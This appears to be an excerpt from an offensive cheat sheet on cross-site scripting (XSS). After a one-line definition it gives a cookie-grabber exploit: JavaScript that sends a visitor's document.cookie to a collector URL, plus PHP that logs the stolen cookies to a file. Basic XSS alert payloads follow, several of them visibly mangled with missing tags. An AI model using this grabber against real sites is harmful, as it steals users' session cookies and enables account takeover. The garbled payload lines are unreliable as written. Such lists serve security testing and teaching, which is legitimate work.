# Cross Site Scripting
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users.
## Exploit code or POC
Cookie grabber for XSS
```
document.location='http://localhost/XSS/grabber.php?c=' + document.cookie
// Write the cookie in a file
$cookie = $_GET['c'];
$fp = fopen('cookies.txt', 'a+');
fwrite($fp, 'Cookie:' .$cookie.'\r\n');
fclose($fp);
?>
```
## XSS in HTML/Applications
XSS Basic
```
Basic payload
ipt>alert('XSS')ipt>
">
">
Img payload
">
">
Svg payload